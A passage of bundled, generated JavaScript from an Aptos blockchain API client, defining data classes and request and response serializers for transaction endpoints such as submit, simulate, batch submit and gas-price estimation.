        if (value instanceof $a7ef34a427d74c9c$export$742231df2dac82cf) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$ea17bcd935bcab90) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$235cc53255f74f73) return value.toJSON();
        throw new Error("Cannot resolve union from AptosGetTransactionsItemValue");
    };
    return AptosGetTransactionsItem;
}();
var $a7ef34a427d74c9c$export$5228de05397d21fd = {
    operationId: "getTransactions",
    groupName: "transactions",
    httpMethod: "get",
    routePattern: "/transactions",
    parameterNames: [
        "limit",
        "start",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return json.map(function(item) {
            return $a7ef34a427d74c9c$export$6ec44d9b97fee83a.fromJSON(item);
        });
    },
    serializeRequest: function(request) {
        var limit = request.limit;
        var start = request.start;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            limit: limit,
            start: start,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$6f9e4c844f96fe71 = /** @class */ function() {
    function AptosSubmitTransactionRequestPayload() {}
    AptosSubmitTransactionRequestPayload.create = function(input) {
        if ($a7ef34a427d74c9c$export$32947f115b4ccda8.isInput(input)) return $a7ef34a427d74c9c$export$32947f115b4ccda8.create(input);
        if ($a7ef34a427d74c9c$export$6cc4df55a0d44e53.isInput(input)) return $a7ef34a427d74c9c$export$6cc4df55a0d44e53.create(input);
        if ($a7ef34a427d74c9c$export$f01b89b84789019c.isInput(input)) return $a7ef34a427d74c9c$export$f01b89b84789019c.create(input);
        throw new Error("Cannot resolve union from AptosSubmitTransactionRequestPayloadInput");
    };
    AptosSubmitTransactionRequestPayload.fromJSON = function(json) {
        if ($a7ef34a427d74c9c$export$32947f115b4ccda8.isJSON(json)) return $a7ef34a427d74c9c$export$32947f115b4ccda8.fromJSON(json);
        if ($a7ef34a427d74c9c$export$6cc4df55a0d44e53.isJSON(json)) return $a7ef34a427d74c9c$export$6cc4df55a0d44e53.fromJSON(json);
        if ($a7ef34a427d74c9c$export$f01b89b84789019c.isJSON(json)) return $a7ef34a427d74c9c$export$f01b89b84789019c.fromJSON(json);
        var keys = Object.keys(json).join(", ");
        var type = json.type;
        throw new Error("Cannot resolve union from AptosSubmitTransactionRequestPayloadJSON (keys: ".concat(keys, ", type: ").concat(type, ")"));
    };
    AptosSubmitTransactionRequestPayload.toJSON = function(value) {
        if (value instanceof $a7ef34a427d74c9c$export$32947f115b4ccda8) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$6cc4df55a0d44e53) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$f01b89b84789019c) return value.toJSON();
        throw new Error("Cannot resolve union from AptosSubmitTransactionRequestPayloadValue");
    };
    return AptosSubmitTransactionRequestPayload;
}();
var $a7ef34a427d74c9c$export$16002326a51c96d0 = /** @class */ function() {
    function AptosSubmitTransactionRequestSignature() {}
    AptosSubmitTransactionRequestSignature.create = function(input) {
        if ($a7ef34a427d74c9c$export$58622fd9455a8cd7.isInput(input)) return $a7ef34a427d74c9c$export$58622fd9455a8cd7.create(input);
        if ($a7ef34a427d74c9c$export$55dc148272439b32.isInput(input)) return $a7ef34a427d74c9c$export$55dc148272439b32.create(input);
        if ($a7ef34a427d74c9c$export$a5822950b052cd20.isInput(input)) return $a7ef34a427d74c9c$export$a5822950b052cd20.create(input);
        throw new Error("Cannot resolve union from AptosSubmitTransactionRequestSignatureInput");
    };
    AptosSubmitTransactionRequestSignature.fromJSON = function(json) {
        if ($a7ef34a427d74c9c$export$58622fd9455a8cd7.isJSON(json)) return $a7ef34a427d74c9c$export$58622fd9455a8cd7.fromJSON(json);
        if ($a7ef34a427d74c9c$export$55dc148272439b32.isJSON(json)) return $a7ef34a427d74c9c$export$55dc148272439b32.fromJSON(json);
        if ($a7ef34a427d74c9c$export$a5822950b052cd20.isJSON(json)) return $a7ef34a427d74c9c$export$a5822950b052cd20.fromJSON(json);
        var keys = Object.keys(json).join(", ");
        var type = json.type;
        throw new Error("Cannot resolve union from AptosSubmitTransactionRequestSignatureJSON (keys: ".concat(keys, ", type: ").concat(type, ")"));
    };
    AptosSubmitTransactionRequestSignature.toJSON = function(value) {
        if (value instanceof $a7ef34a427d74c9c$export$58622fd9455a8cd7) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$55dc148272439b32) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$a5822950b052cd20) return value.toJSON();
        throw new Error("Cannot resolve union from AptosSubmitTransactionRequestSignatureValue");
    };
    return AptosSubmitTransactionRequestSignature;
}();
var $a7ef34a427d74c9c$export$2b87405862f7252b = /** @class */ function() {
    function AptosSubmitTransactionRequest(input) {
        this.sender = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.sender);
        this.sequenceNumber = input.sequenceNumber;
        this.maxGasAmount = input.maxGasAmount;
        this.gasUnitPrice = input.gasUnitPrice;
        this.expirationTimestampSecs = input.expirationTimestampSecs;
        this.payload = $a7ef34a427d74c9c$export$6f9e4c844f96fe71.create(input.payload);
        this.signature = $a7ef34a427d74c9c$export$16002326a51c96d0.create(input.signature);
    }
    AptosSubmitTransactionRequest.create = function(input) {
        if (input instanceof AptosSubmitTransactionRequest) return input;
        return new AptosSubmitTransactionRequest(input);
    };
    AptosSubmitTransactionRequest.fromJSON = function(json) {
        var input = {
            sender: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.sender),
            sequenceNumber: json.sequence_number,
            maxGasAmount: json.max_gas_amount,
            gasUnitPrice: json.gas_unit_price,
            expirationTimestampSecs: json.expiration_timestamp_secs,
            payload: $a7ef34a427d74c9c$export$6f9e4c844f96fe71.fromJSON(json.payload),
            signature: $a7ef34a427d74c9c$export$16002326a51c96d0.fromJSON(json.signature)
        };
        return AptosSubmitTransactionRequest.create(input);
    };
    AptosSubmitTransactionRequest.prototype.toJSON = function() {
        return {
            sender: this.sender.toJSON(),
            sequence_number: this.sequenceNumber,
            max_gas_amount: this.maxGasAmount,
            gas_unit_price: this.gasUnitPrice,
            expiration_timestamp_secs: this.expirationTimestampSecs,
            payload: $a7ef34a427d74c9c$export$6f9e4c844f96fe71.toJSON(this.payload),
            signature: $a7ef34a427d74c9c$export$16002326a51c96d0.toJSON(this.signature)
        };
    };
    return AptosSubmitTransactionRequest;
}();
var $a7ef34a427d74c9c$export$7cbbaa09450d3249 = {
    operationId: "submitTransaction",
    groupName: "transactions",
    httpMethod: "post",
    routePattern: "/transactions",
    parameterNames: [
        "network"
    ],
    hasResponse: true,
    hasBody: true,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$a68d05dfc4c2e46e.fromJSON(json);
    },
    serializeRequest: function(request) {
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            network: network ? network.toJSON() : undefined
        };
    },
    serializeBody: function(body) {
        var value = $a7ef34a427d74c9c$export$2b87405862f7252b.create(body);
        return value.toJSON();
    }
};
var $a7ef34a427d74c9c$export$f0967405290b40bc = /** @class */ function() {
    function AptosGetTransactionByHash() {}
    AptosGetTransactionByHash.create = function(input) {
        if ($a7ef34a427d74c9c$export$a68d05dfc4c2e46e.isInput(input)) return $a7ef34a427d74c9c$export$a68d05dfc4c2e46e.create(input);
        if ($a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.isInput(input)) return $a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.create(input);
        if ($a7ef34a427d74c9c$export$742231df2dac82cf.isInput(input)) return $a7ef34a427d74c9c$export$742231df2dac82cf.create(input);
        if ($a7ef34a427d74c9c$export$ea17bcd935bcab90.isInput(input)) return $a7ef34a427d74c9c$export$ea17bcd935bcab90.create(input);
        if ($a7ef34a427d74c9c$export$235cc53255f74f73.isInput(input)) return $a7ef34a427d74c9c$export$235cc53255f74f73.create(input);
        throw new Error("Cannot resolve union from AptosGetTransactionByHashInput");
    };
    AptosGetTransactionByHash.fromJSON = function(json) {
        if ($a7ef34a427d74c9c$export$a68d05dfc4c2e46e.isJSON(json)) return $a7ef34a427d74c9c$export$a68d05dfc4c2e46e.fromJSON(json);
        if ($a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.isJSON(json)) return $a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.fromJSON(json);
        if ($a7ef34a427d74c9c$export$742231df2dac82cf.isJSON(json)) return $a7ef34a427d74c9c$export$742231df2dac82cf.fromJSON(json);
        if ($a7ef34a427d74c9c$export$ea17bcd935bcab90.isJSON(json)) return $a7ef34a427d74c9c$export$ea17bcd935bcab90.fromJSON(json);
        if ($a7ef34a427d74c9c$export$235cc53255f74f73.isJSON(json)) return $a7ef34a427d74c9c$export$235cc53255f74f73.fromJSON(json);
        var keys = Object.keys(json).join(", ");
        var type = json.type;
        throw new Error("Cannot resolve union from AptosGetTransactionByHashJSON (keys: ".concat(keys, ", type: ").concat(type, ")"));
    };
    AptosGetTransactionByHash.toJSON = function(value) {
        if (value instanceof $a7ef34a427d74c9c$export$a68d05dfc4c2e46e) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$742231df2dac82cf) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$ea17bcd935bcab90) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$235cc53255f74f73) return value.toJSON();
        throw new Error("Cannot resolve union from AptosGetTransactionByHashValue");
    };
    return AptosGetTransactionByHash;
}();
var $a7ef34a427d74c9c$export$bb470345de966f4c = {
    operationId: "getTransactionByHash",
    groupName: "transactions",
    httpMethod: "get",
    routePattern: "/transactions/by_hash/{txn_hash}",
    parameterNames: [
        "txn_hash",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$f0967405290b40bc.fromJSON(json);
    },
    serializeRequest: function(request) {
        var txnHash = request.txnHash;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            txn_hash: txnHash,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$f72635e20ea368fc = /** @class */ function() {
    function AptosGetTransactionByVersion() {}
    AptosGetTransactionByVersion.create = function(input) {
        if ($a7ef34a427d74c9c$export$a68d05dfc4c2e46e.isInput(input)) return $a7ef34a427d74c9c$export$a68d05dfc4c2e46e.create(input);
        if ($a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.isInput(input)) return $a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.create(input);
        if ($a7ef34a427d74c9c$export$742231df2dac82cf.isInput(input)) return $a7ef34a427d74c9c$export$742231df2dac82cf.create(input);
        if ($a7ef34a427d74c9c$export$ea17bcd935bcab90.isInput(input)) return $a7ef34a427d74c9c$export$ea17bcd935bcab90.create(input);
        if ($a7ef34a427d74c9c$export$235cc53255f74f73.isInput(input)) return $a7ef34a427d74c9c$export$235cc53255f74f73.create(input);
        throw new Error("Cannot resolve union from AptosGetTransactionByVersionInput");
    };
    AptosGetTransactionByVersion.fromJSON = function(json) {
        if ($a7ef34a427d74c9c$export$a68d05dfc4c2e46e.isJSON(json)) return $a7ef34a427d74c9c$export$a68d05dfc4c2e46e.fromJSON(json);
        if ($a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.isJSON(json)) return $a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.fromJSON(json);
        if ($a7ef34a427d74c9c$export$742231df2dac82cf.isJSON(json)) return $a7ef34a427d74c9c$export$742231df2dac82cf.fromJSON(json);
        if ($a7ef34a427d74c9c$export$ea17bcd935bcab90.isJSON(json)) return $a7ef34a427d74c9c$export$ea17bcd935bcab90.fromJSON(json);
        if ($a7ef34a427d74c9c$export$235cc53255f74f73.isJSON(json)) return $a7ef34a427d74c9c$export$235cc53255f74f73.fromJSON(json);
        var keys = Object.keys(json).join(", ");
        var type = json.type;
        throw new Error("Cannot resolve union from AptosGetTransactionByVersionJSON (keys: ".concat(keys, ", type: ").concat(type, ")"));
    };
    AptosGetTransactionByVersion.toJSON = function(value) {
        if (value instanceof $a7ef34a427d74c9c$export$a68d05dfc4c2e46e) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$742231df2dac82cf) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$ea17bcd935bcab90) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$235cc53255f74f73) return value.toJSON();
        throw new Error("Cannot resolve union from AptosGetTransactionByVersionValue");
    };
    return AptosGetTransactionByVersion;
}();
var $a7ef34a427d74c9c$export$79a305cfb9e127fc = {
    operationId: "getTransactionByVersion",
    groupName: "transactions",
    httpMethod: "get",
    routePattern: "/transactions/by_version/{txn_version}",
    parameterNames: [
        "txn_version",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$f72635e20ea368fc.fromJSON(json);
    },
    serializeRequest: function(request) {
        var txnVersion = request.txnVersion;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            txn_version: txnVersion,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$47c3842498b6f5ce = /** @class */ function() {
    function AptosGetAccountTransactionsItem() {}
    AptosGetAccountTransactionsItem.create = function(input) {
        if ($a7ef34a427d74c9c$export$a68d05dfc4c2e46e.isInput(input)) return $a7ef34a427d74c9c$export$a68d05dfc4c2e46e.create(input);
        if ($a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.isInput(input)) return $a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.create(input);
        if ($a7ef34a427d74c9c$export$742231df2dac82cf.isInput(input)) return $a7ef34a427d74c9c$export$742231df2dac82cf.create(input);
        if ($a7ef34a427d74c9c$export$ea17bcd935bcab90.isInput(input)) return $a7ef34a427d74c9c$export$ea17bcd935bcab90.create(input);
        if ($a7ef34a427d74c9c$export$235cc53255f74f73.isInput(input)) return $a7ef34a427d74c9c$export$235cc53255f74f73.create(input);
        throw new Error("Cannot resolve union from AptosGetAccountTransactionsItemInput");
    };
    AptosGetAccountTransactionsItem.fromJSON = function(json) {
        if ($a7ef34a427d74c9c$export$a68d05dfc4c2e46e.isJSON(json)) return $a7ef34a427d74c9c$export$a68d05dfc4c2e46e.fromJSON(json);
        if ($a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.isJSON(json)) return $a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.fromJSON(json);
        if ($a7ef34a427d74c9c$export$742231df2dac82cf.isJSON(json)) return $a7ef34a427d74c9c$export$742231df2dac82cf.fromJSON(json);
        if ($a7ef34a427d74c9c$export$ea17bcd935bcab90.isJSON(json)) return $a7ef34a427d74c9c$export$ea17bcd935bcab90.fromJSON(json);
        if ($a7ef34a427d74c9c$export$235cc53255f74f73.isJSON(json)) return $a7ef34a427d74c9c$export$235cc53255f74f73.fromJSON(json);
        var keys = Object.keys(json).join(", ");
        var type = json.type;
        throw new Error("Cannot resolve union from AptosGetAccountTransactionsItemJSON (keys: ".concat(keys, ", type: ").concat(type, ")"));
    };
    AptosGetAccountTransactionsItem.toJSON = function(value) {
        if (value instanceof $a7ef34a427d74c9c$export$a68d05dfc4c2e46e) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$742231df2dac82cf) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$ea17bcd935bcab90) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$235cc53255f74f73) return value.toJSON();
        throw new Error("Cannot resolve union from AptosGetAccountTransactionsItemValue");
    };
    return AptosGetAccountTransactionsItem;
}();
var $a7ef34a427d74c9c$export$5688f6f0c2eb36b3 = {
    operationId: "getAccountTransactions",
    groupName: "transactions",
    httpMethod: "get",
    routePattern: "/accounts/{address}/transactions",
    parameterNames: [
        "address",
        "limit",
        "start",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return json.map(function(item) {
            return $a7ef34a427d74c9c$export$47c3842498b6f5ce.fromJSON(item);
        });
    },
    serializeRequest: function(request) {
        var address = request.address;
        var limit = request.limit;
        var start = request.start;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            address: address,
            limit: limit,
            start: start,
            network: network ? network.toJSON() : undefined
        };
    }
};
// $ref: #/components/schemas/SubmitBatchTransactionResult
// type: SubmitBatchTransactionResult
// properties:
// - transaction_failures ($ref: #/components/schemas/SubmitBatchTransactionResult/properties/transaction_failures)
var $a7ef34a427d74c9c$export$9b7d83b7d5a0bc8 = /** @class */ function() {
    function AptosSubmitBatchTransactionResult(input) {
        this.transactionFailures = input.transactionFailures;
    }
    AptosSubmitBatchTransactionResult.create = function(input) {
        if (input instanceof AptosSubmitBatchTransactionResult) return input;
        return new AptosSubmitBatchTransactionResult(input);
    };
    AptosSubmitBatchTransactionResult.fromJSON = function(json) {
        var input = {
            transactionFailures: json.transaction_failures
        };
        return AptosSubmitBatchTransactionResult.create(input);
    };
    AptosSubmitBatchTransactionResult.prototype.toJSON = function() {
        return {
            transaction_failures: this.transactionFailures
        };
    };
    return AptosSubmitBatchTransactionResult;
}();
var $a7ef34a427d74c9c$export$999cf8764bf9bbd6 = {
    operationId: "submitBatchTransactions",
    groupName: "transactions",
    httpMethod: "post",
    routePattern: "/transactions/batch",
    parameterNames: [
        "network"
    ],
    hasResponse: true,
    hasBody: true,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$9b7d83b7d5a0bc8.fromJSON(json);
    },
    serializeRequest: function(request) {
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            network: network ? network.toJSON() : undefined
        };
    },
    serializeBody: function(body) {
        var value = body.map(function(item) {
            return $a7ef34a427d74c9c$export$2b87405862f7252b.create(item);
        });
        return value.map(function(item) {
            return item.toJSON();
        });
    }
};
var $a7ef34a427d74c9c$export$489be87474a1ed7c = /** @class */ function() {
    function AptosSimulateTransaction() {}
    AptosSimulateTransaction.create = function(input) {
        if ($a7ef34a427d74c9c$export$a68d05dfc4c2e46e.isInput(input)) return $a7ef34a427d74c9c$export$a68d05dfc4c2e46e.create(input);
        if ($a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.isInput(input)) return $a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.create(input);
        if ($a7ef34a427d74c9c$export$742231df2dac82cf.isInput(input)) return $a7ef34a427d74c9c$export$742231df2dac82cf.create(input);
        if ($a7ef34a427d74c9c$export$ea17bcd935bcab90.isInput(input)) return $a7ef34a427d74c9c$export$ea17bcd935bcab90.create(input);
        if ($a7ef34a427d74c9c$export$235cc53255f74f73.isInput(input)) return $a7ef34a427d74c9c$export$235cc53255f74f73.create(input);
        throw new Error("Cannot resolve union from AptosSimulateTransactionInput");
    };
    AptosSimulateTransaction.fromJSON = function(json) {
        if ($a7ef34a427d74c9c$export$a68d05dfc4c2e46e.isJSON(json)) return $a7ef34a427d74c9c$export$a68d05dfc4c2e46e.fromJSON(json);
        if ($a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.isJSON(json)) return $a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.fromJSON(json);
        if ($a7ef34a427d74c9c$export$742231df2dac82cf.isJSON(json)) return $a7ef34a427d74c9c$export$742231df2dac82cf.fromJSON(json);
        if ($a7ef34a427d74c9c$export$ea17bcd935bcab90.isJSON(json)) return $a7ef34a427d74c9c$export$ea17bcd935bcab90.fromJSON(json);
        if ($a7ef34a427d74c9c$export$235cc53255f74f73.isJSON(json)) return $a7ef34a427d74c9c$export$235cc53255f74f73.fromJSON(json);
        var keys = Object.keys(json).join(", ");
        var type = json.type;
        throw new Error("Cannot resolve union from AptosSimulateTransactionJSON (keys: ".concat(keys, ", type: ").concat(type, ")"));
    };
    AptosSimulateTransaction.toJSON = function(value) {
        if (value instanceof $a7ef34a427d74c9c$export$a68d05dfc4c2e46e) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$742231df2dac82cf) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$ea17bcd935bcab90) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$235cc53255f74f73) return value.toJSON();
        throw new Error("Cannot resolve union from AptosSimulateTransactionValue");
    };
    return AptosSimulateTransaction;
}();
var $a7ef34a427d74c9c$export$ba054f595f737627 = {
    operationId: "simulateTransaction",
    groupName: "transactions",
    httpMethod: "post",
    routePattern: "/transactions/simulate",
    parameterNames: [
        "network"
    ],
    hasResponse: true,
    hasBody: true,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$489be87474a1ed7c.fromJSON(json);
    },
    serializeRequest: function(request) {
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            network: network ? network.toJSON() : undefined
        };
    },
    serializeBody: function(body) {
        var value = $a7ef34a427d74c9c$export$2b87405862f7252b.create(body);
        return value.toJSON();
    }
};
var $a7ef34a427d74c9c$export$9786f32708a76124 = /** @class */ function() {
    function AptosEncodeSubmissionRequestPayload() {}
    AptosEncodeSubmissionRequestPayload.create = function(input) {
        if ($a7ef34a427d74c9c$export$32947f115b4ccda8.isInput(input)) return $a7ef34a427d74c9c$export$32947f115b4ccda8.create(input);
        if ($a7ef34a427d74c9c$export$6cc4df55a0d44e53.isInput(input)) return $a7ef34a427d74c9c$export$6cc4df55a0d44e53.create(input);
        if ($a7ef34a427d74c9c$export$f01b89b84789019c.isInput(input)) return $a7ef34a427d74c9c$export$f01b89b84789019c.create(input);
        throw new Error("Cannot resolve union from AptosEncodeSubmissionRequestPayloadInput");
    };
    AptosEncodeSubmissionRequestPayload.fromJSON = function(json) {
        if ($a7ef34a427d74c9c$export$32947f115b4ccda8.isJSON(json)) return $a7ef34a427d74c9c$export$32947f115b4ccda8.fromJSON(json);
        if ($a7ef34a427d74c9c$export$6cc4df55a0d44e53.isJSON(json)) return $a7ef34a427d74c9c$export$6cc4df55a0d44e53.fromJSON(json);
        if ($a7ef34a427d74c9c$export$f01b89b84789019c.isJSON(json)) return $a7ef34a427d74c9c$export$f01b89b84789019c.fromJSON(json);
        var keys = Object.keys(json).join(", ");
        var type = json.type;
        throw new Error("Cannot resolve union from AptosEncodeSubmissionRequestPayloadJSON (keys: ".concat(keys, ", type: ").concat(type, ")"));
    };
    AptosEncodeSubmissionRequestPayload.toJSON = function(value) {
        if (value instanceof $a7ef34a427d74c9c$export$32947f115b4ccda8) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$6cc4df55a0d44e53) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$f01b89b84789019c) return value.toJSON();
        throw new Error("Cannot resolve union from AptosEncodeSubmissionRequestPayloadValue");
    };
    return AptosEncodeSubmissionRequestPayload;
}();
var $a7ef34a427d74c9c$export$8cd96e3af5c40b74 = /** @class */ function() {
    function AptosEncodeSubmissionRequest(input) {
        this.sender = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.sender);
        this.sequenceNumber = input.sequenceNumber;
        this.maxGasAmount = input.maxGasAmount;
        this.gasUnitPrice = input.gasUnitPrice;
        this.expirationTimestampSecs = input.expirationTimestampSecs;
        this.payload = $a7ef34a427d74c9c$export$9786f32708a76124.create(input.payload);
        this.secondarySigners = input.secondarySigners;
    }
    AptosEncodeSubmissionRequest.create = function(input) {
        if (input instanceof AptosEncodeSubmissionRequest) return input;
        return new AptosEncodeSubmissionRequest(input);
    };
    AptosEncodeSubmissionRequest.fromJSON = function(json) {
        var input = {
            sender: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.sender),
            sequenceNumber: json.sequence_number,
            maxGasAmount: json.max_gas_amount,
            gasUnitPrice: json.gas_unit_price,
            expirationTimestampSecs: json.expiration_timestamp_secs,
            payload: $a7ef34a427d74c9c$export$9786f32708a76124.fromJSON(json.payload),
            secondarySigners: json.secondary_signers
        };
        return AptosEncodeSubmissionRequest.create(input);
    };
    AptosEncodeSubmissionRequest.prototype.toJSON = function() {
        return {
            sender: this.sender.toJSON(),
            sequence_number: this.sequenceNumber,
            max_gas_amount: this.maxGasAmount,
            gas_unit_price: this.gasUnitPrice,
            expiration_timestamp_secs: this.expirationTimestampSecs,
            payload: $a7ef34a427d74c9c$export$9786f32708a76124.toJSON(this.payload),
            secondary_signers: this.secondarySigners
        };
    };
    return AptosEncodeSubmissionRequest;
}();
var $a7ef34a427d74c9c$export$fd2a501ff1129ef7 = {
    operationId: "encodeSubmission",
    groupName: "transactions",
    httpMethod: "post",
    routePattern: "/transactions/encode_submission",
    parameterNames: [
        "network"
    ],
    hasResponse: true,
    hasBody: true,
    parseResponse: function(json) {
        return json;
    },
    serializeRequest: function(request) {
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            network: network ? network.toJSON() : undefined
        };
    },
    serializeBody: function(body) {
        var value = $a7ef34a427d74c9c$export$8cd96e3af5c40b74.create(body);
        return value.toJSON();
    }
};
// $ref: #/components/schemas/EstimateGasPriceResult
// type: EstimateGasPriceResult
// properties:
// - deprioritized_gas_estimate ($ref: #/components/schemas/EstimateGasPriceResult/properties/deprioritized_gas_estimate)
// - gas_estimate ($ref: #/components/schemas/EstimateGasPriceResult/properties/gas_estimate)
// - prioritized_gas_estimate ($ref: #/components/schemas/EstimateGasPriceResult/properties/prioritized_gas_estimate)
var $a7ef34a427d74c9c$export$342e9e426e2cb115 = /** @class */ function() {
    function AptosEstimateGasPriceResult(input) {
        this.deprioritizedGasEstimate = input.deprioritizedGasEstimate;
        this.gasEstimate = input.gasEstimate;
        this.prioritizedGasEstimate = input.prioritizedGasEstimate;
    }
    AptosEstimateGasPriceResult.create = function(input) {
        if (input instanceof AptosEstimateGasPriceResult) return input;
        return new AptosEstimateGasPriceResult(input);
    };
    AptosEstimateGasPriceResult.fromJSON = function(json) {
        var input = {
            deprioritizedGasEstimate: json.deprioritized_gas_estimate,
            gasEstimate: json.gas_estimate,
            prioritizedGasEstimate: json.prioritized_gas_estimate
        };
        return AptosEstimateGasPriceResult.create(input);
    };
    AptosEstimateGasPriceResult.prototype.toJSON = function() {
        return {
            deprioritized_gas_estimate: this.deprioritizedGasEstimate,
            gas_estimate: this.gasEstimate,
            prioritized_gas_estimate: this.prioritizedGasEstimate
        };
    };
    return AptosEstimateGasPriceResult;
}();
var $a7ef34a427d74c9c$export$3adaf9223d82a615 = {
    operationId: "estimateGasPrice",
    groupName: "transactions",
    httpMethod: "get",
    routePattern: "/transactions/estimate_gas_price",
    parameterNames: [
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$342e9e426e2cb115.fromJSON(json);
    },
    serializeRequest: function(request) {
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$3e4489f98b7822c3 = /** @class */ function() {
    function AptosBlockTransactionsItem() {}
    AptosBlockTransactionsItem.create = function(input) {
        if ($a7ef34a427d74c9c$export$a68d05dfc4c2e46e.isInput(input)) return $a7ef34a427d74c9c$export$a68d05dfc4c2e46e.create(input);
        if ($a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.isInput(input)) return $a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.create(input);
        if ($a7ef34a427d74c9c$export$742231df2dac82cf.isInput(input)) return $a7ef34a427d74c9c$export$742231df2dac82cf.create(input);
        if ($a7ef34a427d74c9c$export$ea17bcd935bcab90.isInput(input)) return $a7ef34a427d74c9c$export$ea17bcd935bcab90.create(input);
        if ($a7ef34a427d74c9c$export$235cc53255f74f73.isInput(input)) return $a7ef34a427d74c9c$export$235cc53255f74f73.create(input);
        throw new Error("Cannot resolve union from AptosBlockTransactionsItemInput");
    };
    AptosBlockTransactionsItem.fromJSON = function(json) {
        if ($a7ef34a427d74c9c$export$a68d05dfc4c2e46e.isJSON(json)) return $a7ef34a427d74c9c$export$a68d05dfc4c2e46e.fromJSON(json);
        if ($a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.isJSON(json)) return $a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.fromJSON(json);
        if ($a7ef34a427d74c9c$export$742231df2dac82cf.isJSON(json)) return $a7ef34a427d74c9c$export$742231df2dac82cf.fromJSON(json);
        if ($a7ef34a427d74c9c$export$ea17bcd935bcab90.isJSON(json)) return $a7ef34a427d74c9c$export$ea17bcd935bcab90.fromJSON(json);
        if ($a7ef34a427d74c9c$export$235cc53255f74f73.isJSON(json)) return $a7ef34a427d74c9c$export$235cc53255f74f73.fromJSON(json);
        var keys = Object.keys(json).join(", ");
        var type = json.type;
        throw new Error("Cannot resolve union from AptosBlockTransactionsItemJSON (keys: ".concat(keys, ", type: ").concat(type, ")"));
    };
    AptosBlockTransactionsItem.toJSON = function(value) {
        if (value instanceof $a7ef34a427d74c9c$export$a68d05dfc4c2e46e) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe) return value.toJSON();
